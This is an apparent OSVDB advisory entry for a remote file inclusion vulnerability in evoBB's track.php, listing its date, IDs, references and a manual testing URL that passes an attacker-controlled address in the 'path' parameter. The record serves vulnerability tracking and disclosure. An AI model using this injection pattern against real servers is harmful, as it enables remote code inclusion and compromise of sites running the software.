evoBB track.php path Variable Remote File Inclusion

2006-09-25T00:00:00
ID OSVDB:37963
Type osvdb
Reporter OSVDB
Modified 2006-09-25T00:00:00

Description

Manual Testing Notes

http://[target]/[path]/track.php?path=[attacker]

References:

Related OSVDB ID: 37964 ISS X-Force ID: 29145 Generic Exploit URL: http://milw0rm.com/exploits/2431 CVE-2006-5087 Bugtraq ID: 20189